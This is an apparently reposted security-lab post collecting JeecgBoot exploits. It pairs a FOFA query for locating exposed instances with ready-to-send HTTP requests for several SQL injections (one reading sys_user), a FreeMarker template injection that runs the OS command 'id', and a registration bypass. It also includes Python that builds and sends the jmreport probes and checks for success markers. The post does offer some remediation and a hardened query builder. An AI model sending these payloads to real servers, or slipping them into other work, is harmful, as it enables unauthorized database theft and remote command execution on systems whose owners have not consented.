[Vulnerability Reproduction] jeecg vulnerability collection

admin · 2024-01-07 21:12:07

The technical articles of SCA御盾 Lab are for reference only. The information in this article is provided solely so that security personnel can test or maintain the websites, servers, etc. (including but not limited to) for which they are responsible. Do not use the technical material in this article to intrude into any computer system without authorization. Any direct or indirect consequences and losses arising from the use of the information provided here are the sole responsibility of the user. The tools provided in this article are for learning only; any other use is prohibited!!!

0x02 Product description

"Enterprise-grade low-code platform" with a front-end/back-end separated architecture: SpringBoot 2.x/3.x, SpringCloud, Ant Design & Vue, MyBatis, Shiro, JWT. A powerful code generator produces front-end and back-end code in one click, with no code to write! It introduces a new development model, OnlineCoding -> code generation -> manual MERGE, eliminating about 70% of the repetitive work in Java projects so that developers can focus on business logic; it raises efficiency and saves cost without giving up flexibility.


0x03 FOFA query:

app="JEECG"


0x04 Vulnerability details

1. jeecg-boot-getDictItemsByTable-sqli

The three path segments after getDictItemsByTable/ are used as the table, text and code identifiers of the dictionary query. The single quotes in the first two segments are placed so that the query's own template text ends up inside a string literal, and the statement that reaches the database effectively becomes a select of all columns from sys_user.

GET /jeecg-boot/sys/ng-alain/getDictItemsByTable/'%20from%20sys_user/*,%20'/x.js HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

The same request for deployments that serve the application at the root, without the /jeecg-boot context path (headers unchanged):

GET /sys/ng-alain/getDictItemsByTable/'%20from%20sys_user/*,%20'/x.js HTTP/1.1

2. jeecg-boot-queryTableData-sqli

No quoting trick is needed here: the table, text and code parameters are used directly as identifiers, so the request below simply lists every table name and schema from information_schema.tables.

GET /jeecg-boot/sys/dict/queryTableData?pageSize=100&table=information_schema.tables&text=table_name&code=TABLE_SCHEMA

Without the context path:

GET /sys/dict/queryTableData?pageSize=100&table=information_schema.tables&text=table_name&code=TABLE_SCHEMA
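How the two dictionary-query PoCs above turn into SQL, as an added example that is not part of the original post and not JeecgBoot's own code. The query template, its column aliases and the allow-list are assumptions made for this illustration; the real mapper may alias or order the columns differently, but the mechanics are identical whenever table, text and code are dropped into the statement as raw strings. The hardened builder at the end shows the check that stops both requests.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical query template (an assumption for this example, not the
# project's real mapper): identifiers are inserted by string substitution,
# which is exactly the failure mode the two PoCs exploit.
TEMPLATE = 'select {text} as "text", {code} as "value" from {table}'


def build_dict_sql(table: str, text: str, code: str) -> str:
    """Vulnerable builder: the three identifiers are not validated at all."""
    return TEMPLATE.format(table=table, text=text, code=code)


def sql_from_path_poc(url: str) -> str:
    """PoC 1: the path segments after /getDictItemsByTable/ are (table, text, code).
    The `*, '` in the second segment opens a string literal that the leading `'`
    of the first segment closes again, swallowing the template's own text."""
    path = urlsplit(url).path
    marker = "/getDictItemsByTable/"
    tail = path[path.index(marker) + len(marker):]
    table, text, code = (unquote(seg) for seg in tail.split("/", 2))
    return build_dict_sql(table, text, code)


def sql_from_query_poc(url: str) -> str:
    """PoC 2: table/text/code arrive as query parameters, so the caller just
    names another table; no injection syntax is needed."""
    q = parse_qs(urlsplit(url).query)
    return build_dict_sql(q["table"][0], q["text"][0], q["code"][0])


def quoted_literals(sql: str) -> list:
    """Single-quoted literals as the database will parse them."""
    return re.findall(r"'[^']*'", sql)


# Hardened variant: plain identifiers only, and the table must be allow-listed.
IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
ALLOWED_TABLES = {"sys_dict_item", "sys_category"}  # constructed allow-list


def build_dict_sql_safe(table: str, text: str, code: str) -> str:
    for ident in (table, text, code):
        if not IDENT.fullmatch(ident):
            raise ValueError(f"illegal identifier: {ident!r}")
    if table not in ALLOWED_TABLES:
        raise ValueError(f"table not allowed: {table!r}")
    return TEMPLATE.format(table=table, text=text, code=code)


def is_rejected(table: str, text: str, code: str) -> bool:
    """True when the hardened builder refuses the input."""
    try:
        build_dict_sql_safe(table, text, code)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed target host; the paths are the two PoCs from the post.
    poc1 = "http://target/jeecg-boot/sys/ng-alain/getDictItemsByTable/'%20from%20sys_user/*,%20'/x.js"
    poc2 = ("http://target/jeecg-boot/sys/dict/queryTableData?pageSize=100"
            "&table=information_schema.tables&text=table_name&code=TABLE_SCHEMA")
    sql1, sql2 = sql_from_path_poc(poc1), sql_from_query_poc(poc2)
    print("PoC 1 ->", sql1)
    print("        literal swallowed:", quoted_literals(sql1))
    print("PoC 2 ->", sql2)
    print("hardened rejects PoC 1:", is_rejected("' from sys_user", "*, '", "x.js"))
    print("hardened rejects PoC 2:", is_rejected("information_schema.tables", "table_name", "TABLE_SCHEMA"))
```

The allow-list is the important half of the fix: an identifier regex alone would still let a caller read any table whose name is a plain word, such as sys_user.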

3. jeecg-boot-sqli

Error-based injection through the id field of the report query: updatexml() is given a malformed XPath expression built from md5(123456), so the database error returned by the application contains the hash e10adc3949ba59abbe56e057f20f883e (MySQL truncates the echoed expression to 32 characters).

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Content-Type: application/json;charset=UTF-8

{"apiSelectId":"1290104038414721025","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select md5(123456))),1)) or '%%' like '"}

Without the context path (same headers and body):

POST /jmreport/qurestSql HTTP/1.1

4. jeecg-queryFieldBySql-rce

The SQL string carries a FreeMarker directive. When the report module renders it, freemarker.template.utility.Execute runs the command id and its output is returned in the response. The double quotes inside the JSON string value must be escaped with a backslash, otherwise the body is not valid JSON.

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json

{"sql":"select '<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"id\") }' "}

Without the context path (same headers and body):

POST /jmreport/queryFieldBySql HTTP/1.1
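An added verification script for the two jmreport requests above (not the post's own scanner and not JeecgBoot code): it builds both context-path variants, JSON-escapes the FreeMarker payload correctly, and recognises the marker each payload leaves behind, the truncated md5 in the updatexml() error for qurestSql and the uid=/gid= output of id for queryFieldBySql. The target host, the sample responses and their JSON shape are constructed for the example; only send_probe() touches the network and it is not called when the script runs offline.

```python
import hashlib
import json
import urllib.error
import urllib.request

# PoC 3 feeds ':' + md5(123456) to updatexml(); MySQL answers with
# "XPATH syntax error: ':e10adc3949ba59abbe56e057f20f883'" (32 chars kept).
MD5_MARKER = hashlib.md5(b"123456").hexdigest()

SQLI_BODY = {
    "apiSelectId": "1290104038414721025",
    "id": "1' or '%1%' like (updatexml(0x3a,concat(1,(select md5(123456))),1)) or '%%' like '",
}
# PoC 4: the FreeMarker directive sits inside a SQL string literal; its double
# quotes must be JSON-escaped on the wire, which json.dumps() takes care of.
SSTI_BODY = {
    "sql": "select '<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"id\") }' "
}

HEADERS = {
    "Content-Type": "application/json;charset=UTF-8",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0",
}


def encode_body(body: dict) -> str:
    """Wire form of a request body; escapes the quotes inside the SSTI payload."""
    return json.dumps(body)


def build_probes(base_url: str) -> list:
    """(name, url, body) for both layouts in the post: with and without the
    /jeecg-boot context path."""
    base = base_url.rstrip("/")
    probes = []
    for prefix in ("/jeecg-boot", ""):
        probes.append(("qurestSql", f"{base}{prefix}/jmreport/qurestSql", SQLI_BODY))
        probes.append(("queryFieldBySql", f"{base}{prefix}/jmreport/queryFieldBySql", SSTI_BODY))
    return probes


def check_sqli(response_text: str) -> bool:
    """Error-based oracle: the truncated error carries the first 31 hex digits."""
    return MD5_MARKER[:31] in response_text


def check_ssti(response_text: str) -> bool:
    """`id` ran if the response echoes its 'uid=...(...) gid=...' output."""
    return "uid=" in response_text and "gid=" in response_text


CHECKS = {"qurestSql": check_sqli, "queryFieldBySql": check_ssti}


def classify(name: str, response_text: str) -> str:
    return "vulnerable" if CHECKS[name](response_text) else "no indicator"


def send_probe(url: str, body: dict, timeout: float = 10.0) -> str:
    """POST the body. Error-based SQLi usually comes back as HTTP 500, so the
    error body is returned instead of being raised."""
    req = urllib.request.Request(
        url, data=encode_body(body).encode(), headers=HEADERS, method="POST"
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


# Constructed sample responses: the JSON shape is illustrative, the markers are
# what the checks key on.
SAMPLE_SQLI_RESPONSE = (
    '{"success":false,"code":500,"message":"XPATH syntax error: '
    "':e10adc3949ba59abbe56e057f20f883'\"}"
)
SAMPLE_SSTI_RESPONSE = (
    '{"success":true,"code":200,"result":[{"fieldName":'
    '"uid=1000(jeecg) gid=1000(jeecg) groups=1000(jeecg)"}]}'
)

if __name__ == "__main__":
    for name, url, body in build_probes("http://target"):
        print(f"{name:16} {url}")
    print("qurestSql       ->", classify("qurestSql", SAMPLE_SQLI_RESPONSE))
    print("queryFieldBySql ->", classify("queryFieldBySql", SAMPLE_SSTI_RESPONSE))
```

To run it against a real host you are authorised to test, replace the sample responses with `send_probe(url, body)` for each probe returned by `build_probes()`; the checks are deliberately content-based rather than status-code-based because a 500 is the expected response for the error-based injection.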

5. jeecg-register-login-bypass (exploit EXP published on the author's Knowledge Planet)

Registration request with a fixed smscode value; the full exploit was released separately on the Knowledge Planet.

POST /jeecg-boot/sys/user/register HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Content-Type: application/json;charset=UTF-8

{"username": "aaaa","password": "123456","phone": "123456","smscode": "0enb"}

0x05 Remediation

1. Upgrade the JeecgBoot system to the latest version.

2. Download the latest security patches from the official site: http://jeecg.com

3. After patching, re-send the requests above (both with and without the /jeecg-boot context path) and confirm that each one is rejected.

Vulnerability PoC + batch vulnerability scanning script + EXP

Originally published on the WeChat official account (SCA御盾): 【漏洞复现】jeecg漏洞集合

Reposted by CN-SEC中文网 (please keep this link when reposting): https://cn-sec.com/archives/2371057.html
